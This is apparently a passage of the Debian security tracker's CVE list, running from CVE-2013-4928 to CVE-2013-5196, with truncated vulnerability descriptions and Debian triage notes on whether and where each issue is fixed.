NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-5196 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-5195 (WebKit, as used in Apple Safari before 6.1.1 and 7.x before 7.0.1, all ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-5194 RESERVED CVE-2013-5193 (The App Store component in Apple iOS before 7.0.4 does not properly en ...) NOT-FOR-US: Apple CVE-2013-5192 (The USB hub controller in Apple Mac OS X before 10.9 allows local user ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5191 (The syslog implementation in Apple Mac OS X before 10.9 allows local u ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5190 (Smart Card Services in Apple Mac OS X before 10.9 does not properly im ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5189 (Apple Mac OS X before 10.9 does not preserve a certain administrative ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5188 (The Screen Lock implementation in Apple Mac OS X before 10.9, when hib ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5187 (The Screen Lock implementation in Apple Mac OS X before 10.9 does not ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5186 (Power Management in Apple Mac OS X before 10.9 does not properly handl ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5185 (The ldapsearch command-line program in OpenLDAP in Apple Mac OS X befo ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5184 (The kernel in Apple Mac OS X before 10.9 does not properly check for e ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5183 (Mail in Apple Mac OS X before 10.9, when Kerberos authentication is en ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5182 (Mail in Apple Mac OS X before 10.9 allows remote attackers to spoof th ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5181 (The auto-configuration feature in Mail in Apple Mac OS X before 10.9 s ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5180 (The srandomdev function in Libc in Apple Mac OS X before 10.9, when th ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5179 (App Sandbox in Apple Mac OS X before 10.9 allows attackers to bypass i ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5178 (LaunchServices in Apple Mac OS X before 10.9 does not properly restric ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5177 (The kernel in Apple Mac OS X before 10.9 allows local users to cause a ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5176 (The kernel in Apple Mac OS X before 10.9 does not properly handle inte ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5175 (The kernel in Apple Mac OS X before 10.9 allows local users to obtain ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5174 (Integer signedness error in the kernel in Apple Mac OS X before 10.9 a ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5173 (The random-number generator in the kernel in Apple Mac OS X before 10. ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5172 (The kernel in Apple Mac OS X before 10.9 does not properly determine t ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5171 (CoreGraphics in Apple Mac OS X before 10.9 allows local users to bypas ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5170 (Buffer underflow in CoreGraphics in Apple Mac OS X before 10.9 allows ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5169 (CoreGraphics in Apple Mac OS X before 10.9, when display-sleep mode is ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5168 (Console in Apple Mac OS X before 10.9 allows user-assisted remote atta ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5167 (CFNetwork in Apple Mac OS X before 10.9 does not properly support Safa ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5166 (The Bluetooth USB host controller in Apple Mac OS X before 10.9 premat ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5165 (socketfilterfw in Application Firewall in Apple Mac OS X before 10.9 d ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5164 (Multiple race conditions in the Phone app in Apple iOS before 7.0.3 al ...) NOT-FOR-US: Apple iOS CVE-2013-5163 (Directory Services in Apple Mac OS X before 10.8.5 Supplemental Update ...) NOT-FOR-US: Apple OS X CVE-2013-5162 (Passcode Lock in Apple iOS before 7.0.3 on iPhone devices allows physi ...) NOT-FOR-US: Apple iOS CVE-2013-5161 (Passcode Lock in Apple iOS before 7.0.2 does not properly manage the l ...) NOT-FOR-US: Apple iOS CVE-2013-5160 (Passcode Lock in Apple iOS before 7.0.2 on iPhone devices allows physi ...) NOT-FOR-US: Apple iOS CVE-2013-5159 (WebKit in Apple iOS before 7 allows remote attackers to bypass the Sam ...) NOT-FOR-US: Apple iOS CVE-2013-5158 (The Social subsystem in Apple iOS before 7 does not properly restrict ...) NOT-FOR-US: Apple iOS CVE-2013-5157 (The Twitter subsystem in Apple iOS before 7 does not require API confo ...) NOT-FOR-US: Apple iOS CVE-2013-5156 (The Telephony subsystem in Apple iOS before 7 does not require API con ...) NOT-FOR-US: Apple iOS CVE-2013-5155 (The Sandbox subsystem in Apple iOS before 7 allows attackers to cause ...) NOT-FOR-US: Apple iOS CVE-2013-5154 (The Sandbox subsystem in Apple iOS before 7 determines the sandboxing ...) NOT-FOR-US: Apple iOS CVE-2013-5153 (Springboard in Apple iOS before 7 does not properly manage the lock st ...) NOT-FOR-US: Apple iOS CVE-2013-5152 (Mobile Safari in Apple iOS before 7 allows remote attackers to spoof t ...) NOT-FOR-US: Apple iOS CVE-2013-5151 (Mobile Safari in Apple iOS before 7 does not prevent HTML interpretati ...) NOT-FOR-US: Apple iOS CVE-2013-5150 (The history-clearing feature in Safari in Apple iOS before 7 does not ...) NOT-FOR-US: Apple iOS CVE-2013-5149 (The Push Notifications subsystem in Apple iOS before 7 provides the pu ...) NOT-FOR-US: Apple iOS CVE-2013-5148 (Apple Keynote before 6.0 does not properly handle the interaction betw ...) NOT-FOR-US: Apple Keynote CVE-2013-5147 (Passcode Lock in Apple iOS before 7 does not properly manage the lock ...) NOT-FOR-US: Apple iOS CVE-2013-5146 RESERVED CVE-2013-5145 (kextd in Kext Management in Apple iOS before 7 does not properly verif ...) NOT-FOR-US: Apple iOS CVE-2013-5144 (Passcode Lock in Apple iOS before 7.0.3 on iPhone devices allows physi ...) NOT-FOR-US: Apple iOS CVE-2013-5143 (The RADIUS service in Server App in Apple OS X Server before 3.0 selec ...) NOT-FOR-US: Apple OS X Server CVE-2013-5142 (The kernel in Apple iOS before 7 does not initialize unspecified kerne ...) NOT-FOR-US: Apple iOS CVE-2013-5141 (The kernel in Apple iOS before 7 uses an incorrect data size for a cer ...) NOT-FOR-US: Apple iOS CVE-2013-5140 (The kernel in Apple iOS before 7 allows remote attackers to cause a de ...) NOT-FOR-US: Apple iOS CVE-2013-5139 (The IOSerialFamily driver in Apple iOS before 7 allows attackers to ex ...) NOT-FOR-US: Apple iOS CVE-2013-5138 (IOCatalogue in IOKitUser in Apple iOS before 7 allows attackers to cau ...) NOT-FOR-US: Apple iOS CVE-2013-5137 (IOKit in Apple iOS before 7 allows attackers to send user-interface ev ...) NOT-FOR-US: Apple iOS CVE-2013-5136 (Apple Remote Desktop before 3.7 does not properly use server authentic ...) NOT-FOR-US: Apple Remote Desktop CVE-2013-5135 (Format string vulnerability in Screen Sharing Server in Apple Mac OS X ...) NOT-FOR-US: Apple Mac OS X CVE-2013-5134 REJECTED CVE-2013-5133 (Backup in Apple iOS before 7.1 does not properly restrict symlinks, wh ...) NOT-FOR-US: Apple CVE-2013-5132 (Apple AirPort Base Station Firmware before 7.6.4 does not properly han ...) NOT-FOR-US: Apple AirPort CVE-2013-5131 (Cross-site scripting (XSS) vulnerability in WebKit in Apple iOS before ...) NOT-FOR-US: Apple iOS CVE-2013-5130 (WebKit in Apple Safari before 6.1 disables the Private Browsing featur ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2013-5129 (Multiple cross-site scripting (XSS) vulnerabilities in WebKit in Apple ...) NOT-FOR-US: Apple iOS CVE-2013-5128 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-5127 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-5126 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-5125 (WebKit, as used in Apple iOS before 7, allows remote attackers to exec ...) NOT-FOR-US: Apple iOS CVE-2013-5124 RESERVED CVE-2013-5123 (The mirroring support (-M, --use-mirrors) in Python Pip before 1.5 use ...) - python-pip 1.4.1-1 (unimportant) [squeeze] - python-pip (Support for mirroring introduced in 0.8.1) NOTE: This is additional hardening / security feature, not a vulnerabily (despite NOTE: the discussion on oss-sec) CVE-2013-5122 (Cisco Linksys Routers EA2700, EA3500, E4200, EA4500: A bug can cause a ...) NOT-FOR-US: Linksys CVE-2013-5121 (SQL injection vulnerability in PHPFox before 3.6.0 (build6) allows rem ...) NOT-FOR-US: PHPFox CVE-2013-5120 (SQL injection vulnerability in PHPFox before 3.6.0 (build4) allows rem ...) NOT-FOR-US: PHPFox CVE-2013-5119 (Zimbra Collaboration Suite (ZCS) 6.0.16 and earlier allows man-in-the- ...) NOT-FOR-US: Zimbra Collaboration Suite CVE-2013-5118 (Cross-site scripting (XSS) vulnerability in the Good for Enterprise ap ...) NOT-FOR-US: Good for Enterprise app for iOS CVE-2013-5117 (SQL injection vulnerability in the RSS page (DNNArticleRSS.aspx) in th ...) NOT-FOR-US: DotNetNuke CVE-2013-5116 (Evernote prior to 5.5.1 has insecure password change ...) NOT-FOR-US: Evernote CVE-2013-5115 RESERVED CVE-2013-5114 (LastPass prior to 2.5.1 allows secure wipe bypass. ...) NOT-FOR-US: LastPass CVE-2013-5113 (LastPass prior to 2.5.1 has an insecure PIN implementation. ...) NOT-FOR-US: LastPass CVE-2013-5112 (Evernote before 5.5.1 has insecure PIN storage ...) NOT-FOR-US: Evernote CVE-2013-5111 RESERVED CVE-2013-5110 RESERVED CVE-2013-5109 RESERVED CVE-2013-5108 (Multiple cross-site scripting (XSS) vulnerabilities in the xn function ...) - rockmongo (bug #702961) CVE-2013-5107 (Directory traversal vulnerability in RockMongo 1.1.5 and earlier allow ...) - rockmongo (bug #702961) CVE-2013-5106 (A Code Execution vulnerability exists in select.py when using python-m ...) NOT-FOR-US: python vim mode, different from src:python-mode, which is for emacs CVE-2013-5105 RESERVED CVE-2013-5104 RESERVED CVE-2013-5103 RESERVED CVE-2013-5102 RESERVED CVE-2013-5101 RESERVED CVE-2013-5100 (Cross-site scripting (XSS) vulnerability in the Static Methods since 2 ...) NOT-FOR-US: TYPO3 extension Static Methods CVE-2013-5099 (Cross-site scripting (XSS) vulnerability in article.php in Anchor CMS ...) NOT-FOR-US: Anchor CMS CVE-2013-5098 (Cross-site scripting (XSS) vulnerability in admin/admin.php in the Dow ...) NOT-FOR-US: WordPress plugin download-monitor CVE-2013-5097 (Juniper Junos Space before 13.1R1.6, as used on the JA1500 appliance a ...) NOT-FOR-US: Juniper Junos Space CVE-2013-5096 (Juniper Junos Space before 13.1R1.6, as used on the JA1500 appliance a ...) NOT-FOR-US: Juniper Junos Space CVE-2013-5095 (Cross-site scripting (XSS) vulnerability in the web-based interface in ...) NOT-FOR-US: Juniper Junos Space CVE-2013-5094 (Cross-site scripting (XSS) vulnerability in index.exp in McAfee Vulner ...) NOT-FOR-US: McAfee Vulnerability Manager CVE-2013-5093 (The renderLocalView function in render/views.py in graphite-web in Gra ...) - graphite-web 0.9.12+debian-1 (bug #720454) NOTE: http://ceriksen.com/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/ CVE-2013-5092 (Cross-site scripting (XSS) vulnerability in afa/php/Login.php in AlgoS ...) NOT-FOR-US: AlgoSec Firewall Analyzer CVE-2013-5091 (SQL injection vulnerability in CalendarCommon.php in vTiger CRM 5.4.0 ...) NOT-FOR-US: vTiger CRM CVE-2013-5090 REJECTED CVE-2013-5089 REJECTED CVE-2013-5088 REJECTED CVE-2013-5087 REJECTED CVE-2013-5086 REJECTED CVE-2013-5085 REJECTED CVE-2013-5084 REJECTED CVE-2013-5083 REJECTED CVE-2013-5082 REJECTED CVE-2013-5081 REJECTED CVE-2013-5080 REJECTED CVE-2013-5079 REJECTED CVE-2013-5078 REJECTED CVE-2013-5077 REJECTED CVE-2013-5076 REJECTED CVE-2013-5075 REJECTED CVE-2013-5074 REJECTED CVE-2013-5073 REJECTED CVE-2013-5072 (Cross-site scripting (XSS) vulnerability in Outlook Web Access in Micr ...) NOT-FOR-US: Microsoft Exchange Server OWA CVE-2013-5071 REJECTED CVE-2013-5070 REJECTED CVE-2013-5069 REJECTED CVE-2013-5068 REJECTED CVE-2013-5067 REJECTED CVE-2013-5066 REJECTED CVE-2013-5065 (NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Serv ...) NOT-FOR-US: Microsoft Windows CVE-2013-5064 REJECTED CVE-2013-5063 REJECTED CVE-2013-5062 REJECTED CVE-2013-5061 REJECTED CVE-2013-5060 REJECTED CVE-2013-5059 (Microsoft SharePoint Server 2010 SP1 and SP2 and 2013, and Office Web ...) NOT-FOR-US: Microsoft SharePoint Server CVE-2013-5058 (Integer overflow in the kernel-mode drivers in Microsoft Windows XP SP ...) NOT-FOR-US: Microsoft Windows Kernel CVE-2013-5057 (hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not im ...) NOT-FOR-US: Microsoft Windows Kernel CVE-2013-5056 (Use-after-free vulnerability in the Scripting Runtime Object Library i ...) NOT-FOR-US: Microsoft Windows CVE-2013-5055 REJECTED CVE-2013-5054 (Microsoft Office 2013 and 2013 RT allows remote attackers to discover ...) NOT-FOR-US: Microsoft Office CVE-2013-5053 REJECTED CVE-2013-5052 (Microsoft Internet Explorer 7 allows remote attackers to execute arbit ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5051 (Microsoft Internet Explorer 10 and 11 allows remote attackers to execu ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5050 REJECTED CVE-2013-5049 (Microsoft Internet Explorer 6 through 9 allows remote attackers to exe ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5048 (Microsoft Internet Explorer 6 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5047 (Microsoft Internet Explorer 6 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5046 (Microsoft Internet Explorer 7 through 11 allows local users to bypass ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5045 (Microsoft Internet Explorer 10 and 11 allows local users to bypass the ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5044 REJECTED CVE-2013-5043 REJECTED CVE-2013-5042 (Cross-site scripting (XSS) vulnerability in Microsoft ASP.NET SignalR ...) NOT-FOR-US: Microsoft ASP.NET SignalR CVE-2013-5041 REJECTED CVE-2013-5040 RESERVED CVE-2013-5039 (Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSec ...) NOT-FOR-US: HOT HOTBOX router CVE-2013-5038 (The HOT HOTBOX router with software 2.1.11 allows remote attackers to ...) NOT-FOR-US: HOT HOTBOX router CVE-2013-5037 (The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12 ...) NOT-FOR-US: HOT HOTBOX router CVE-2013-5036 (The Square Squash allows remote attackers to execute arbitrary code vi ...) NOT-FOR-US: Square Squash CVE-2013-5035 (Multiple race conditions in HtmlCleaner before 2.6, as used in Open-Xc ...) NOT-FOR-US: Open-Xchange CVE-2013-5034 (Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2 ...) NOT-FOR-US: Atmail CVE-2013-5033 (Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2 ...) NOT-FOR-US: Atmail CVE-2013-5032 (Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2 ...) NOT-FOR-US: Atmail CVE-2013-5031 (Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2 ...) NOT-FOR-US: Atmail CVE-2013-5030 (Ruckus Wireless Zoneflex 2942 devices with firmware 9.6.0.0.267 allow ...) NOT-FOR-US: Ruckus Wireless Zoneflex CVE-2013-5029 (phpMyAdmin 3.5.x and 4.0.x before 4.0.5 allows remote attackers to byp ...) - phpmyadmin 4:4.0.5-1 [squeeze] - phpmyadmin (Backport not feasible and X-Frame-Options protection enough on any modern browser) [wheezy] - phpmyadmin (Backport not feasible and X-Frame-Options protection enough on any modern browser) CVE-2013-5028 (SQL injection vulnerability in IT/hardware-list.dll in Kwoksys Kwok In ...) NOT-FOR-US: Kwok Information Server CVE-2013-5027 (Collabtive 1.0 has incorrect access control ...) - collabtive [jessie] - collabtive (fixed in version 1.1) CVE-2013-5026 (An ActiveX control in lookout650.ocx, lookout660.ocx, and lookout670.o ...) NOT-FOR-US: National Instruments Lookout CVE-2013-5025 (An ActiveX control in exlauncher.dll in the Help subsystem in National ...) NOT-FOR-US: National Instruments CVE-2013-5024 (An ActiveX control in NationalInstruments.Help2.dll in National Instru ...) NOT-FOR-US: National Instruments CVE-2013-5023 (The ActiveX controls in the HelpAsst component in NI Help Links in Nat ...) NOT-FOR-US: National Instruments CVE-2013-5022 (Absolute path traversal vulnerability in the 3D Graph ActiveX control ...) NOT-FOR-US: National Instruments CVE-2013-5021 (Multiple absolute path traversal vulnerabilities in National Instrumen ...) NOT-FOR-US: National Instruments CVE-2013-5020 (Multiple cross-site scripting (XSS) vulnerabilities in bb_admin.php in ...) NOT-FOR-US: miniBB CVE-2013-5019 (Stack-based buffer overflow in Ultra Mini HTTPD 1.21 allows remote att ...) NOT-FOR-US: Ultra Mini HTTPD CVE-2013-5018 (The is_asn1 function in strongSwan 4.1.11 through 5.0.4 does not prope ...) - strongswan (Only affects 5.0.4 from experimental) NOTE: The PEM aspect is under control of the administrator, so not a security issue NOTE: The XAuth / EAP Issue only affects 5.0.3/5.0.4 CVE-2013-5017 (SNMPConfig.php in the management console in Symantec Web Gateway (SWG) ...) NOT-FOR-US: Symantec Web Gateway CVE-2013-5016 (Symantec Critical System Protection (SCSP) before 5.2.9, when installe ...) NOT-FOR-US: Symantec CVE-2013-5015 (SQL injection vulnerability in the management console in Symantec Endp ...) NOT-FOR-US: Symantec Endpoint Protection CVE-2013-5014 (The management console in Symantec Endpoint Protection Manager (SEPM) ...) NOT-FOR-US: Symantec Endpoint Protection CVE-2013-5013 (Multiple cross-site scripting (XSS) vulnerabilities in the management ...) NOT-FOR-US: Symantec WEB Gateway CVE-2013-5012 (Multiple SQL injection vulnerabilities in the management console on th ...) NOT-FOR-US: Symantec Web Gateway CVE-2013-5011 (Unquoted Windows search path vulnerability in the client in Symantec E ...) NOT-FOR-US: Symantec Endpoint Protection CVE-2013-5010 (The Application/Device Control (ADC) component in the client in Symant ...) NOT-FOR-US: Symantec Endpoint Protection CVE-2013-5009 (The Management Console in Symantec Endpoint Protection (SEP) 11.x befo ...) NOT-FOR-US: Symantec Endpoint Protection CVE-2013-5008 (The agent and task-agent components in Symantec Management Platform 7. ...) NOT-FOR-US: Symantec CVE-2013-5007 RESERVED CVE-2013-5006 (main_internet.php on the Western Digital My Net N600 and N750 with fir ...) NOT-FOR-US: Western Digital Router CVE-2013-5005 (Multiple cross-site scripting (XSS) vulnerabilities in ajaxRequest/met ...) NOT-FOR-US: Tripwire Enterprise CVE-2013-5004 RESERVED CVE-2013-4994 RESERVED CVE-2013-4993 RESERVED CVE-2013-4992 RESERVED CVE-2013-4991 RESERVED CVE-2013-4990 RESERVED CVE-2013-4989 RESERVED CVE-2013-4988 (Stack-based buffer overflow in IcoFX 2.5 and earlier allows remote att ...) NOT-FOR-US: IcoFX CVE-2013-4987 (PineApp Mail-SeCure before 3.70 allows remote authenticated users to g ...) NOT-FOR-US: PinApp CVE-2013-4986 (Stack-based buffer overflow in PDFAX0722_IconCool.dll 7.22.1125.2121 i ...) NOT-FOR-US: PDFCool CVE-2013-4985 (Multiple Vivotek IP Cameras remote authentication bypass that could al ...) NOT-FOR-US: Vivotek IP Cameras CVE-2013-4984 (The close_connections function in /opt/cma/bin/clear_keys.pl in Sophos ...) NOT-FOR-US: Sophos Web Protection Appliance CVE-2013-4983 (The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appl ...) NOT-FOR-US: Sophos Web Protection Appliance CVE-2013-4982 (AVTECH AVN801 DVR has a security bypass via the administration login c ...) NOT-FOR-US: AVTECH DVR CVE-2013-4981 (Buffer overflow in cgi-bin/user/Config.cgi in AVTECH AVN801 DVR with f ...) NOT-FOR-US: AVTECH DVR CVE-2013-4980 (Buffer overflow in the RTSP Packet Handler in AVTECH AVN801 DVR with f ...) NOT-FOR-US: AVTECH DVR CVE-2013-4979 (Buffer overflow in the gldll32.dll module in EPS Viewer 3.2 and earlie ...) NOT-FOR-US: EPS Viewer CVE-2013-4978 (Stack-based buffer overflow in AloahaPDFViewer 5.0.0.7 and earlier in ...) NOT-FOR-US: Aloaha PDF Suite CVE-2013-4977 (Buffer overflow in the RTSP Packet Handler in Hikvision DS-2CD7153-E I ...) NOT-FOR-US: Hikvision IP camera CVE-2013-4976 (Hikvision DS-2CD7153-E IP Camera has security bypass via hardcoded cre ...) NOT-FOR-US: Hikvision DS-2CD7153-E IP Camera CVE-2013-4975 (Hikvision DS-2CD7153-E IP Camera has Privilege Escalation ...) NOT-FOR-US: Hikvision DS-2CD7153-E IP Camera CVE-2013-4974 (RealNetworks RealPlayer before 16.0.3.51, and RealPlayer SP 1.0 throug ...) NOT-FOR-US: RealPlayer CVE-2013-4973 (Stack-based buffer overflow in RealNetworks RealPlayer before 16.0.3.5 ...) NOT-FOR-US: RealPlayer CVE-2013-4972 RESERVED CVE-2013-4971 (Puppet Enterprise before 3.2.0 does not properly restrict access to no ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4970 RESERVED CVE-2013-4969 (Puppet before 3.3.3 and 3.4 before 3.4.1 and Puppet Enterprise (PE) be ...) {DSA-2831-1} - puppet 3.4.1-1 NOTE: http://puppetlabs.com/security/cve/cve-2013-4969 CVE-2013-4968 (Puppet Enterprise before 3.0.1 allows remote attackers to (1) conduct ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4967 (Puppet Enterprise before 3.0.1 allows remote attackers to obtain the d ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4966 (The master external node classification script in Puppet Enterprise be ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4965 (Puppet Enterprise before 3.1.0 does not properly restrict the number o ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4964 (Puppet Enterprise before 3.0.1 does not set the secure flag for the se ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4963 (Multiple cross-site request forgery (CSRF) vulnerabilities in Puppet E ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4962 (The reset password page in Puppet Enterprise before 3.0.1 does not for ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4961 (Puppet Enterprise before 3.0.1 includes version information for the Ap ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4960 RESERVED CVE-2013-4959 (Puppet Enterprise before 3.0.1 uses HTTP responses that contain sensit ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4958 (Puppet Enterprise before 3.0.1 does not use a session timeout, which m ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4957 (The dashboard report in Puppet Enterprise before 3.0.1 allows attacker ...) NOT-FOR-US: puppet-dashboard CVE-2013-4956 (Puppet Module Tool (PMT), as used in Puppet 2.7.x before 2.7.23 and 3. ...) {DSA-2761-1} - puppet 3.2.4-1 [squeeze] - puppet (puppet module not yet present) CVE-2013-4955 (Open redirect vulnerability in the login page in Puppet Enterprise bef ...) - puppet (Only affects Puppet Enterprise) CVE-2013-4954 (Multiple cross-site scripting (XSS) vulnerabilities in wp-login.php in ...) NOT-FOR-US: Genetech Solutions Pie-Register CVE-2013-4953 (SQL injection vulnerability in play.php in Top Games Script 1.2 allows ...) NOT-FOR-US: Top Games Script CVE-2013-4952 (SQL injection vulnerability in functions/global.php in Elemata CMS RC ...) NOT-FOR-US: Elemata CMS CVE-2013-4951 (Multiple cross-site scripting (XSS) vulnerabilities in Mintboard 0.3 a ...) NOT-FOR-US: Mintboard CVE-2013-4950 (Cross-site scripting (XSS) vulnerability in view.php in Machform 2 all ...) NOT-FOR-US: Machform CVE-2013-4949 (Unrestricted file upload vulnerability in view.php in Machform 2 allow ...) NOT-FOR-US: Machform CVE-2013-4948 (SQL injection vulnerability in view.php in Machform 2 allows remote at ...) NOT-FOR-US: Machform CVE-2013-4947 (Unspecified vulnerability in the update and build database page in Saw ...) NOT-FOR-US: Sawmill CVE-2013-4946 (Multiple cross-site scripting (XSS) vulnerabilities in BMC Service Des ...) NOT-FOR-US: BMC Service Desk Express CVE-2013-4945 (Multiple SQL injection vulnerabilities in BMC Service Desk Express (SD ...) NOT-FOR-US: BMC Service Desk Express CVE-2013-4944 (Cross-site scripting (XSS) vulnerability in the BuddyPress Extended Fr ...) NOT-FOR-US: BuddyPress CVE-2013-4943 (The client application in Siemens COMOS before 9.1 Update 458, 9.2 bef ...) NOT-FOR-US: Siemens COMOS CVE-2013-4942 (Cross-site scripting (XSS) vulnerability in flashuploader.swf in the U ...) - moodle 2.5.1-1 [squeeze] - moodle (Vulnerable code not present) CVE-2013-4941 (Cross-site scripting (XSS) vulnerability in uploader.swf in the Upload ...) - moodle 2.5.1-1 [squeeze] - moodle (Vulnerable code not installed in package) CVE-2013-4940 (Cross-site scripting (XSS) vulnerability in io.swf in the IO Utility c ...) - moodle 2.5.1-1 [squeeze] - moodle (Vulnerable code not present) CVE-2013-4939 (Cross-site scripting (XSS) vulnerability in io.swf in the IO Utility c ...) - moodle 2.5.1-1 [squeeze] - moodle (Vulnerable code not present) CVE-2013-4938 (The LTI (aka IMS-LTI) mod_form implementation in Moodle through 2.1.10 ...) - moodle 2.5.1-1 [squeeze] - moodle (Vulnerable code not present) CVE-2013-4995 (Cross-site scripting (XSS) vulnerability in phpMyAdmin 3.5.x before 3. ...) {DSA-2975-1 DLA-0014-1} - phpmyadmin 4:4.0.4.2-1 (low) [squeeze] - phpmyadmin 4:3.3.7-8 CVE-2013-4996 (Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5. ...) {DSA-2975-1 DLA-0014-1} - phpmyadmin 4:4.0.4.2-1 [squeeze] - phpmyadmin 4:3.3.7-8 CVE-2013-4997 (Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5. ...) - phpmyadmin 4:4.0.4.2-1 [wheezy] - phpmyadmin (Vulnerable code not present) [squeeze] - phpmyadmin (Vulnerable code not present) CVE-2013-4998 (phpMyAdmin 3.5.x before 3.5.8.2 and 4.0.x before 4.0.4.2 allows remote ...) - phpmyadmin 4:4.0.4.2-1 (unimportant) NOTE: Full path disclosure irrelevant in Debian packages CVE-2013-4999 (phpMyAdmin 4.0.x before 4.0.4.2 allows remote attackers to obtain sens ...) - phpmyadmin 4:4.0.4.2-1 (unimportant) NOTE: Full path disclosure irrelevant in Debian packages CVE-2013-5000 (phpMyAdmin 3.5.x before 3.5.8.2 allows remote attackers to obtain sens ...) - phpmyadmin 4:4.0.4.2-1 (unimportant) NOTE: Full path disclosure irrelevant in Debian packages CVE-2013-5001 (Cross-site scripting (XSS) vulnerability in libraries/plugins/transfor ...) - phpmyadmin 4:4.0.4.2-1 (low) [squeeze] - phpmyadmin (Vulnerable code not present) [wheezy] - phpmyadmin (Vulnerable code not present) CVE-2013-5002 (Cross-site scripting (XSS) vulnerability in libraries/schema/Export_Re ...) {DSA-2975-1} - phpmyadmin 4:4.0.4.2-1 (low) [squeeze] - phpmyadmin (Vulnerable code not present) CVE-2013-5003 (Multiple SQL injection vulnerabilities in phpMyAdmin 3.5.x before 3.5. ...) {DSA-2975-1 DLA-0014-1} - phpmyadmin 4:4.0.4.2-1 [squeeze] - phpmyadmin 4:3.3.7-8 CVE-2013-4937 (Multiple unspecified vulnerabilities in the AiCloud feature on the ASU ...) NOT-FOR-US: Asus firmware CVE-2013-4936 (The IsDFP_Frame function in plugins/profinet/packet-pn-rt.c in the PRO ...) - wireshark 1.10.1-1 [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) CVE-2013-4935 (The dissect_per_length_determinant function in epan/dissectors/packet- ...) {DSA-2734-1} - wireshark 1.10.1-1 CVE-2013-4934 (The netmon_open function in wiretap/netmon.c in the Netmon file parser ...) {DSA-2734-1} - wireshark 1.10.1-1 CVE-2013-4933 (The netmon_open function in wiretap/netmon.c in the Netmon file parser ...) {DSA-2734-1} - wireshark 1.10.1-1 CVE-2013-4932 (Multiple array index errors in epan/dissectors/packet-gsm_a_common.c i ...) {DSA-2734-1} - wireshark 1.10.1-1 CVE-2013-4931 (epan/proto.c in Wireshark 1.8.x before 1.8.9 and 1.10.x before 1.10.1 ...) {DLA-497-1} - wireshark 1.10.1-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-4930 (The dissect_dvbci_tpdu_hdr function in epan/dissectors/packet-dvbci.c ...) {DSA-2734-1} - wireshark 1.10.1-1 [squeeze] - wireshark (Affected dissector not yet present) CVE-2013-4929 (The parseFields function in epan/dissectors/packet-dis-pdus.c in the D ...) {DLA-497-1} - wireshark 1.10.1-1 (unimportant) NOTE: Not suitable for code injection CVE-2013-4928 (Integer signedness error in the dissect_headers function in epan/disse ...) - wireshark 1.10.1-1 (unimportant) [wheezy] - wireshark (Only affects 1.10.x) [squeeze] - wireshark (Only affects 1.10.x) NOTE: 